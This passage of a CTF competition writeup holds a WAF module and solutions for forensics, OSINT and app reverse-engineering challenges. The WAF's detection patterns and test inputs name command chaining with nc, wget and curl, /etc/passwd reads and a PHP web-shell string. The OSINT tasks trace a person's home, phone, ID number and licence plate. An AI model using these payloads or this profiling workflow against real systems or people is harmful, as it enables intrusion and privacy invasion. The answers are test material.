        return phone[:3] + "****" + phone[-4:] if len(phone) == 11 else phone

    @staticmethod
    def generate_md5(text: str) -> str:
        """Compute the MD5 hash of a string.

        Args:
            text: The string to hash.

        Returns:
            The 32-character lowercase MD5 hex digest.
        """
        return hashlib.md5(text.encode('utf-8')).hexdigest()

    def parse_review_item(self, item) -> Optional[ReviewData]:
        """Parse a single review item.

        Args:
            item: A review element parsed by BeautifulSoup.

        Returns:
            The parsed ReviewData object, or None if parsing fails.
        """
        try:
            return ReviewData(
                user_id=item.find('span', class_='user-id').get_text(strip=True).replace('用户ID：', ''),
                username=item.find('span', class_='reviewer-name').get_text(strip=True).replace('用户名：', ''),
                phone=item.find('span', class_='reviewer-phone').get_text(strip=True).replace('联系电话：', ''),
                content=item.find('div', class_='review-content').get_text(strip=True),
                signature=self.generate_md5(
                    item.find('span', class_='user-id').get_text(strip=True) +
                    item.find('span', class_='reviewer-name').get_text(strip=True) +
                    item.find('span', class_='reviewer-phone').get_text(strip=True)
                ),
                user_agent=item.find('span', class_='user-agent').get_text(strip=True).replace('使用设备：', '')
            )
        except Exception as e:
            print(f"Error parsing review item: {e}")
            return None

    def process_page(self, html: str) -> None:
        """Process the HTML of a single page.

        Args:
            html: The HTML string to parse.
        """
        soup = BeautifulSoup(html, 'html.parser')

        for item in soup.find_all('div', class_='review-item'):
            review = self.parse_review_item(item)
            if review:
                is_safe = "TRUE" if not self.waf.detect_all(review.user_agent)['is_malicious'] else "FALSE"
                self.data.append([
                    review.user_id,
                    self.mask_phone(review.phone),
                    is_safe
                ])

    def scrape(self, start_id: int, end_id: int, base_url: str) -> None:
        """Scrape the product pages in the given ID range.

        Args:
            start_id: First product ID.
            end_id: Last product ID (inclusive).
            base_url: URL format string containing one {} for the product ID.
        """
        for product_id in range(start_id, end_id + 1):
            try:
                response = requests.get(base_url.format(product_id))
                response.raise_for_status()
                self.process_page(response.text)
                print(f"Processed product ID: {product_id}")
            except requests.RequestException as e:
                print(f"Error fetching product ID {product_id}: {e}")

    def save_to_csv(self, filename: str) -> None:
        """Save the collected data to a CSV file.

        Args:
            filename: Name of the output file.
        """
        with open(filename, "w", newline="", encoding="utf-8") as f:
            csv.writer(f).writerows(self.data)
        print(f"Data saved to {filename}")

if __name__ == "__main__":
    scraper = ReviewScraper()
    scraper.scrape(
        start_id=1,
        end_id=500,
        base_url="http://47.117.188.170:33073/index.php?controller=product&action=detail&id={}"
    )
    scraper.save_to_csv("output.csv")

waf.py

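import datetime
import re
from urllib.parse import unquote
from typing import Dict, Tuple, Optional, List, Pattern, Union

class WAF:
    """
    Web application firewall (WAF) module, enhanced version.

    Features:
    - SQL injection detection
    - XSS (cross-site scripting) detection
    - Command injection detection
    - Path traversal detection
    - Sensitive information detection
    - Custom rule support
    - Performance optimizations
    - Attack logging

    The interface stays compatible with the previous version.
    """

    def __init__(self, strict_mode: bool = False, enable_logging: bool = False):
        """
        Initialize the WAF.

        :param strict_mode: strict mode (detects more potential threats, possibly with more false positives)
        :param enable_logging: whether to record an attack log
        """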
        self.strict_mode = strict_mode
        self.enable_logging = enable_logging
        self.attack_log = []
        self.custom_rules = []
        self._init_patterns()

    def _init_patterns(self) -> None:
        """Initialize the detection rules."""
        # Precompile all regular expressions for performance
        self._rules = {
            'sql_injection': [
                (re.compile(
                    r"(['\"])?.*(union|select|insert|update|delete|drop|alter|create|truncate|rename|exec|execute|grant|revoke|declare|fetch).*?\1",
                    re.I), "SQL injection keyword"),
                (re.compile(r"\b(and|or)\b\s*[\d\"']+\s*=\s*[\d\"']+", re.I), "SQL boolean injection"),
                (re.compile(r"\b(and|or)\b\s*[\w\"']+\s*[=<>]+\s*[\w\"']+", re.I), "SQL conditional injection"),
                (re.compile(r"sleep\s*\(\s*\d+\s*\)", re.I), "SQL delay function"),
                (re.compile(r"benchmark\s*\(.*?,.*?\)", re.I), "SQL benchmark function"),
                (re.compile(r"waitfor\s+delay\s+['\"].+?['\"]", re.I), "SQL delay statement"),
            ],
            'xss': [
                (re.compile(r"<script.*?>.*?</script>", re.I), "script tag"),
                (re.compile(r"javascript\s*:", re.I), "JavaScript protocol"),
                (re.compile(r"on[a-z]+\s*=", re.I), "event handler"),
                (re.compile(r"<iframe.*?>", re.I), "iframe tag"),
                (re.compile(r"<img.*?src=.*?>", re.I), "img tag"),
                (re.compile(r"<svg.*?>", re.I), "SVG tag"),
                (re.compile(r"alert\s*\(.*?\)", re.I), "alert function"),
                (re.compile(r"document\.cookie", re.I), "cookie access"),
                (re.compile(r"eval\s*\(.*?\)", re.I), "eval function"),
            ],
            'command_injection': [
                (re.compile(
                    r"[;&|]\s*(ls|dir|cat|type|more|less|whoami|id|pwd|echo|rm|del|mv|cp|chmod|chown|wget|curl|ftp|nc|telnet|ssh|ping|nslookup)\b",
                    re.I), "command chaining"),
                (re.compile(r"\b(rm|del|mv|cp|chmod|chown)\b.*?[;&|]", re.I), "dangerous command"),
                (re.compile(r"\$(\(|\{).*?(\)|\})", re.I), "variable expansion"),
                (re.compile(r"`.*?`", re.I), "backtick command"),
                (re.compile(r"\b(exec|system|passthru|shell_exec|popen|proc_open|pcntl_exec)\s*\(.*?\)", re.I),
                 "PHP command execution"),
            ],
            'path_traversal': [
                (re.compile(r"(\.\./)+", re.I), "directory traversal (Unix)"),
                (re.compile(r"(\.\.\\)+", re.I), "directory traversal (Windows)"),
                (re.compile(r"/etc/passwd", re.I), "sensitive file access"),
                (re.compile(r"/proc/self/environ", re.I), "environment variable access"),
                (re.compile(r"c:\\windows\\", re.I), "Windows system directory"),
            ],
            'sensitive_info': [
                (re.compile(r"\b(password|passwd|pwd|secret|token|api_key|access_key|auth)\s*=\s*['\"]?[\w-]+['\"]?",
                            re.I), "sensitive information leak"),
                (re.compile(r"\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b"), "credit card number"),
                (re.compile(r"\b\d{3}[- ]?\d{2}[- ]?\d{4}\b"), "social security number"),
            ]
        }

        if self.strict_mode:
            self._add_strict_rules()

    def _add_strict_rules(self) -> None:
        """Add the extra rules used in strict mode."""
        self._rules['sql_injection'].extend([
            (re.compile(r"\b(like|where|from|having)\b", re.I), "SQL keyword"),
            (re.compile(r"--|#", re.I), "SQL comment"),
        ])
        self._rules['xss'].append(
            (re.compile(r"<.*?>", re.I), "HTML tag")
        )

    def add_custom_rule(self, rule_name: str, pattern: Union[str, Pattern], description: str = "") -> None:
        """
        Add a custom detection rule.

        :param rule_name: rule name
        :param pattern: regular expression (string or precompiled pattern)
        :param description: rule description
        """
        if isinstance(pattern, str):
            compiled_pattern = re.compile(pattern, re.I)
        else:
            compiled_pattern = pattern

        if rule_name not in self._rules:
            self._rules[rule_name] = []

        self._rules[rule_name].append((compiled_pattern, description))
        self.custom_rules.append((rule_name, pattern.pattern if hasattr(pattern, 'pattern') else pattern, description))

    def _log_attack(self, attack_type: str, pattern: str, input_str: str) -> None:
        """Record an attack attempt."""
        if self.enable_logging:
            log_entry = {
                'type': attack_type,
                'pattern': pattern,
                'input': input_str,
                'timestamp': datetime.datetime.now().isoformat()
            }
            self.attack_log.append(log_entry)

    def detect(self, input_str: str, rule_type: str) -> Tuple[bool, Optional[str]]:
        """
        Detect a specific type of attack.

        :param input_str: input string
        :param rule_type: rule type (sql_injection|xss|command_injection|path_traversal|sensitive_info)
        :return: (whether an attack was detected, description of the matched pattern)
        """
        if rule_type not in self._rules:
            return False, None

        decoded = unquote(input_str)
        for pattern, description in self._rules[rule_type]:
            if pattern.search(decoded):
                self._log_attack(rule_type, description, input_str)
                return True, description
        return False, None

    def detect_sql_injection(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'sql_injection')

    def detect_xss(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'xss')

    def detect_command_injection(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'command_injection')

    def detect_path_traversal(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'path_traversal')

    def detect_sensitive_info(self, input_str: str) -> Tuple[bool, Optional[str]]:
        return self.detect(input_str, 'sensitive_info')

    def detect_all(self, input_str: str) -> Dict[str, Union[bool, Tuple[bool, Optional[str]]]]:
        """
        Run all attack detectors.

        :param input_str: input string
        :return: dict with the result of every detector
        """
        results = {
            'sql_injection': self.detect_sql_injection(input_str),
            'xss': self.detect_xss(input_str),
            'command_injection': self.detect_command_injection(input_str),
            'path_traversal': self.detect_path_traversal(input_str),
            'sensitive_info': self.detect_sensitive_info(input_str),
        }

        # Check custom rules
        custom_results = {}
        for rule_name in set(self._rules.keys()) - {'sql_injection', 'xss', 'command_injection', 'path_traversal',
                                                    'sensitive_info'}:
            custom_results[rule_name] = self.detect(input_str, rule_name)

        results.update(custom_results)
        results['is_malicious'] = any(result[0] for result in results.values() if isinstance(result, tuple))

        return results

    def get_attack_log(self) -> List[Dict]:
        """Return a copy of the attack log."""
        return self.attack_log.copy()

    def clear_attack_log(self) -> None:
        """Clear the attack log."""
        self.attack_log.clear()

    @staticmethod
    def sanitize_input(input_str: str, max_length: Optional[int] = None) -> str:
        """
        Sanitize an input string.

        :param input_str: input string
        :param max_length: maximum allowed length (optional)
        :return: the sanitized string
        """
        if not input_str:
            return input_str

        # Enforce the length limit
        if max_length is not None and len(input_str) > max_length:
            input_str = input_str[:max_length]

        # Strip HTML tags
        sanitized = re.sub(r'<[^>]*>', '', str(input_str))
        # Escape special characters
        sanitized = (
            sanitized.replace("'", "&#39;")
            .replace('"', "&#34;")
            .replace("<", "&lt;")
            .replace(">", "&gt;")
            .replace("\\", "\\\\")
        )
        return sanitized

# Example usage
if __name__ == "__main__":
    import datetime

    # Initialise the WAF
    waf = WAF(strict_mode=True, enable_logging=True)

    # Add a custom rule
    waf.add_custom_rule('php_attack', r'<\?php.*?\?>', 'PHP code injection')

    # Test inputs
    test_inputs = [
        "admin' OR '1'='1",
        "<script>alert('XSS')</script>",
        "cat /etc/passwd; ls -la",
        "../../../etc/passwd",
        "normal input",
        "password=123456",
        "<?php system($_GET['cmd']); ?>",
    ]

    for test in test_inputs:
        print(f"\nTest input: {test}")
        results = waf.detect_all(test)

        if results['is_malicious']:
            print("  [!] Malicious input detected!")
            for rule, result in results.items():
                # 'is_malicious' holds a plain bool, not a (detected, pattern) tuple
                if rule == 'is_malicious':
                    continue
                detected, pattern = result
                if detected:
                    print(f"    - {rule}: {pattern}")
        else:
            print("  [√] Input is safe")

    # Show the attack log
    print("\nAttack log:")
    for log in waf.get_attack_log():
        print(f"[{log['timestamp']}] {log['type']}: {log['pattern']} (input: {log['input']})")

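Data Analysis Challenges

1. Tracing and Forensics, Challenge 1

Mounting the image in FTK yields the file 重要文件.docx.

Exporting the file, opening it and going through its contents turns up the key string:

Answer:

b1e9517338f261396511359bce56bf58

2. Tracing and Forensics, Challenge 2

The FTK image from the previous challenge also contains 内存.7z. After extracting it and digging through the contents, we find the IP address behind the corresponding web traffic.

Answer: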

114.10.143.92

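3. Data Social Engineering, Task 1

The task asks for the target's residence and employer. The employer is already known from the other tasks, so only the residence remains. With the phone number and similar details, the relevant latitude and longitude are easy to find in the ride-hailing data, and the map data then gives the residential compound.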
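The last step, going from a drop-off coordinate to a residential compound, can be sketched as a nearest-neighbour lookup. This is only an illustration: the writeup does not describe the format of the ride-hailing or map data, so the `places` list, the `dropoff` point and both function names are hypothetical.

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    r = 6371000.0  # mean Earth radius in metres
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def nearest_place(point, places):
    """Return (name, distance_m) of the entry in places closest to point=(lat, lon)."""
    lat, lon = point
    name, plat, plon = min(places, key=lambda p: haversine_m(lat, lon, p[1], p[2]))
    return name, haversine_m(lat, lon, plat, plon)

# Hypothetical sample data: (name, latitude, longitude)
places = [("Compound A", 31.1100, 121.3800), ("Compound B", 31.2000, 121.4500)]
dropoff = (31.1105, 121.3803)  # hypothetical drop-off point from a ride record
print(nearest_place(dropoff, places))
```

In practice the most frequent late-evening drop-off point for the phone number is a reasonable candidate for the residence, but that heuristic is an assumption, not something the writeup states.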

Answer:

华润国际E区:闵行区星辰信息技术园

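4. Data Social Engineering, Task 2

The task asks for the company name. The phone number is known from Task 3, and looking it up in the courier waybills shows that the company is some 博林科技 entity.

A Python script then searches the business registration data for 博林: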

import openpyxl
import os

def find_string_in_multiple_excels(folder_path, target_string):
    """
    Walk through multiple Excel files and look for the target string.

    :param folder_path: path of the folder that holds the Excel files
    :param target_string: string to search for
    :return: None; matches are printed
    """
    try:
        # Collected matches
        results = []

        # Iterate over data0.xlsx through data99.xlsx
        for i in range(100):  # 0 to 99
            file_name = f"data{i}.xlsx"
            file_path = os.path.join(folder_path, file_name)

            # Skip files that do not exist
            if not os.path.exists(file_path):
                print(f"File not found: {file_path}")
                continue

            print(f"Checking file: {file_name}")

            # Load the workbook
            workbook = openpyxl.load_workbook(file_path)

            # Iterate over every worksheet
            for sheet_name in workbook.sheetnames:
                sheet = workbook[sheet_name]

                # Iterate over every cell in the worksheet
                for row in sheet.iter_rows():
                    for cell in row:
                        if cell.value and target_string in str(cell.value):
                            # On a match, record the file name, sheet name, cell coordinate and content
                            result = {
                                "file": file_name,
                                "sheet": sheet_name,
                                "cell": cell.coordinate,
                                "content": cell.value
                            }
                            results.append(result)
                            print(f"Match - file: {file_name}, sheet: {sheet_name}, cell: {cell.coordinate}, content: {cell.value}")

        # Print the final summary
        if not results:
            print("No matching string found.")
        else:
            print("\n=== Search results ===")
            for res in results:
                print(f"File: {res['file']}, sheet: {res['sheet']}, cell: {res['cell']}, content: {res['content']}")

    except Exception as e:
        print(f"Error: {e}")

# Example usage
if __name__ == "__main__":
    # Ask for the folder that holds the Excel files
    folder_path = input("Folder containing the Excel files: ").strip()
    search_string = input("String to search for: ").strip()

    # Run the search
    find_string_in_multiple_excels(folder_path, search_string)

Answer:

江苏博林科技有限公司

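5. Data Social Engineering, Task 3

The task asks for the phone number. The name is already known, so we search the crawled web pages for it.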
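A search of this kind could be scripted roughly as follows. This is a minimal sketch, not the method actually used: it assumes the crawled pages are saved as `.html` files in one folder and that the phone number appears close to the name in the page text. The function names, the `window` parameter and the sample string are all hypothetical.

```python
import re
from pathlib import Path

# Mainland-China mobile numbers: 11 digits starting with 1[3-9],
# not embedded in a longer digit run (for example an 18-digit ID number).
PHONE_RE = re.compile(r'(?<!\d)1[3-9]\d{9}(?!\d)')

def phones_near_name(text, name, window=200):
    """Return phone numbers that lie within `window` characters of an occurrence of `name`."""
    name_spans = [m.span() for m in re.finditer(re.escape(name), text)]
    found = []
    for m in PHONE_RE.finditer(text):
        near = any(m.start() <= end + window and m.end() >= start - window
                   for start, end in name_spans)
        if near and m.group() not in found:
            found.append(m.group())
    return found

def scan_folder(folder, name, window=200):
    """Map each .html file under `folder` to the phone numbers found near `name`."""
    hits = {}
    for path in Path(folder).rglob('*.html'):
        text = path.read_text(encoding='utf-8', errors='ignore')
        phones = phones_near_name(text, name, window)
        if phones:
            hits[str(path)] = phones
    return hits

# Hypothetical page text with two people far apart
sample = "Zhang San 13800000000 " + "x" * 300 + " Li Si 13900000000"
print(phones_near_name(sample, "Zhang San", window=50))
```

The same approach carries over to Task 4 by swapping the roles: search for the known phone number and extract nearby 18-character ID numbers.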

Answer:

13891889377

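6. Data Social Engineering, Task 4

The task asks for the ID card number. The phone number is known, so again we search the crawled web pages.

Answer: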

61050119980416547X

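7. Data Social Engineering, Task 5

The task asks for the license plate number. The phone number is known, so we go through the parking lot data. It is a brute-force manual search, but the match turns up eventually :)

578.jpg

Answer: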

浙B QY318

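8. Data Attack and Defense, Task 1

Analysing the traffic shows that a large share of the later requests is boolean-based blind SQL injection. Reconstructing the data that the injection extracted gives the answer.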
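Reconstructing the extracted data can be sketched as below. The writeup does not show the actual payloads, so the payload shape (`ascii(substr(<expr>,<pos>,1))=<code>`), the table name in the demo, and the way a "true" response is recognised are all assumptions; `recover` and `PROBE_RE` are hypothetical names. The idea is simply to keep, for each character position, the character code whose probe came back true.

```python
import re
from urllib.parse import unquote

# Assumed payload shape: ...substr(<expr>,<pos>,1))=<code>...
PROBE_RE = re.compile(r'substr\w*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)', re.I)

def recover(probes):
    """probes: iterable of (url_or_payload, is_true). Returns the recovered string."""
    chars = {}
    for raw, is_true in probes:
        m = PROBE_RE.search(unquote(raw))
        if m and is_true:
            # A true equality probe fixes the character at this position
            chars[int(m.group(1))] = chr(int(m.group(2)))
    return ''.join(chars[i] for i in sorted(chars))

# Synthetic demo: three probes per position, only the matching code is "true"
secret = "f8"
probes = []
for pos, ch in enumerate(secret, start=1):
    for code in (48, ord(ch), 122):
        url = f"/item?id=1%20and%20ascii(substr((select%20flag%20from%20t),{pos},1))={code}"
        probes.append((url, code == ord(ch)))
print(recover(probes))  # prints f8
```

With a real capture, the `(payload, is_true)` pairs would come from the HTTP requests and a property of the matching responses (for instance body length or a marker string), exported from the pcap beforehand.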

Answer:

f84c4233dd185ca3c083c7b3dbc4ff8b

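App Security Challenges

1. 偷天换日

A function called from JNI_OnLoad decrypts a dex file.

Use frida to dump the decrypted dex.

The logic in the dex shows that the scheme is Base58 encoding.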
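For reference, Base58 decoding is short enough to write by hand. The sketch below assumes the standard Bitcoin alphabet; the dumped dex may well use a custom or shuffled alphabet, in which case it can be passed through the `alphabet` parameter. The function names are illustrative.

```python
# Standard Bitcoin Base58 alphabet (an assumption; the app may use a different one)
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def b58decode(s, alphabet=ALPHABET):
    """Decode a Base58 string to bytes."""
    n = 0
    for ch in s:
        n = n * 58 + alphabet.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    # Each leading "zero digit" of the alphabet stands for one leading zero byte
    pad = len(s) - len(s.lstrip(alphabet[0]))
    return b'\x00' * pad + body

def b58encode(data, alphabet=ALPHABET):
    """Encode bytes as a Base58 string."""
    n = int.from_bytes(data, 'big')
    out = ''
    while n:
        n, r = divmod(n, 58)
        out = alphabet[r] + out
    pad = len(data) - len(data.lstrip(b'\x00'))
    return alphabet[0] * pad + out

print(b58decode(b58encode(b"flag{test}")))
```

Decoding the target string found in the dex with `b58decode` would then yield the flag bytes, provided the alphabet matches the one in the app.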

This gives the flag:

flag{j#n$j@m^,*2}

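2. GoodLuck

The code is obfuscated, so we inspect it in JEB.

MD5 constants show up, so the guess is that it is plain MD5.

An online MD5 lookup gives the flag: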

flag{r9d3jv4}

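3. babyapk

The baby_xor function lives in the native (.so) layer.

Decrypting with the given key never produces the right result, and no cross-references turn up either.

The point where the key is modified is found in init_array.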

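# Ciphertext bytes
c=[119, 9, 40, 44, 106, 84, 113, 124, 34, 93, 122, 121, 119, 4, 120, 124, 36, 7, 127, 42, 117, 6, 112, 41, 32, 4, 112, 47, 119, 81, 123, 47, 33, 81, 40, 120, 114, 24]
# Key after the modification made in init_array
c1=[0x11,0x65, 0x49, 0x4b]
# XOR each ciphertext byte with the repeating 4-byte key
for i in range(len(c)):
    c[i]^=c1[i%len(c1)]
    print(chr(c[i]),end="")

This gives the flag: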

flag{1873832fa175b6adc9b1a9df42d04a3c}

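4. IOSApp

Search the strings in IDA.

This one hits a reverse engineer's reflexes straight away: gmbh is flag with every letter shifted up by one.

#include <stdio.h>
#include <string.h>

int main(void) {
    char cipher[] = "gmbh|zpv mppljoh gps `nf~";
    char plain[strlen(cipher) + 1]; // +1 for the null terminator

    for (size_t i = 0; i < strlen(cipher); i++) {
        plain[i] = cipher[i] - 1; // subtract 1 from each character's ASCII value
    }
    plain[strlen(cipher)] = '\0'; // add the string terminator
    printf("%s\n", plain); // print the decrypted result
    return 0;
}

This gives the flag: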

flag{you_looking_for_me}

5. 这个木马在干啥

Frida handles this one in a single shot:

Java.perform(function () {
    var MainActivity = Java.use("com.ctf.backdoor.MainActivity");
    var str = "ezAGDYwENV/al9r0udClbQ==";
    var result = MainActivity.ooxx(str);
    console.log(result);
});

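As the picture shows, freshly learned frida did the job. Only my thin-and-light laptop had the environment set up, hence the masterful photo of the screen.

6. Privacy Master (1)

Found in the main function: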

READ_PHONE_STATE,ACCESS_FINE_LOCATION

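7. Privacy Master (3)

Answer: 1,10,16,20,22

Issue 1, compliant: the code uses the showPrivacyPolicyDialog pop-up to state the third-party data sharing scenarios, but adds no description of the specific scenario at the point where data is shared.

Issue 10, violation: noteDao.getAllNote() and noteDao.getBackUpNote() do not reflect different retention periods for different data types.

Issue 16, partially compliant: the settings menu is reached through setting_menu, but the withdrawal path lacks operating guidance.

Issue 20, violation: the privacy pop-up only offers an email channel; in-app withdrawal is not implemented.

Issue 22, compliant: onResume() checks for policy updates in real time, but the effective-time definition lacks a timestamp record.

Task statement: based on the issues listed below, state which of them apply to the app's privacy policy. Answer with the item numbers in ascending order, separated by ASCII commas. (An item counts only if the policy covers the topic and is non-compliant; topics the policy does not mention do not count as violations. Mind the submission limit.)

1) The specific scenarios for sharing data with third parties are not clearly stated
2) Sharing rules for anonymised information and personal information are not distinguished
3) The specifics of cross-border data transfer are not described
4) The types of third-party partners that may be involved are not listed
5) The allocation of responsibility after data is shared is not described
6) Data transfer in special scenarios such as mergers and acquisitions is not mentioned
7) Sharing required by law is not described
8) The minimum-necessary principle for shared data is not described

Data storage issues (7 items):

9) The basis for calculating specific retention periods is not stated
10) Retention periods are not differentiated by data type
11) The data destruction procedure and how it is verified are not described
12) The geographic location of cross-border storage is not stated
13) Handling after the retention period expires is not described
14) No notification method for changes to retention periods is provided
15) Retention rules for backup data are not described

User rights issues (6 items):

16) The concrete steps for withdrawing consent are not described
17) The processing time for withdrawal requests is not stated
18) Service features that withdrawal may affect are not mentioned
19) The identity verification method is not described
20) No withdrawal channel other than email is provided
21) Exceptions to withdrawal of consent are not described

Policy update issues (6 items):

22) The effective time of an update is not stated
23) How major changes are specially flagged is not described
24) No way to consult historical policy versions is provided
25) The criteria for a "major change" are not defined
26) What happens if the user rejects an update is not described
27) The channel for pushing update notices is not stated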

8. Harmony

https://github.com/ohos-decompiler/abc-decompiler/releases

Take the MD5 of goodgood16f85293e920fd49eda6bf0df98bfd33.
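The hashing step can be reproduced with the standard library. This sketch assumes the whole string is hashed as UTF-8 text and that the hex digest is wrapped in `flag{...}`; the writeup does not spell out either detail, and `md5_hex` is an illustrative helper name.

```python
import hashlib

def md5_hex(text):
    """Return the lowercase hex MD5 digest of a UTF-8 string."""
    return hashlib.md5(text.encode('utf-8')).hexdigest()

candidate = "goodgood16f85293e920fd49eda6bf0df98bfd33"
print("flag{" + md5_hex(candidate) + "}")
```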

This gives the flag:

flag{ee51e080d1db85f9927fe87aa92267bb}

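Closing notes:

Everyone is welcome to join us:

星盟安全团队 recruitment group 1: 222328705

星盟安全团队 recruitment group 2: 346014666

If you are interested, come and join the discussion!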


Editor: @Elite

Originally published on the WeChat official account 星盟安全: 数字中国创新大赛-数字安全赛道 Writeup
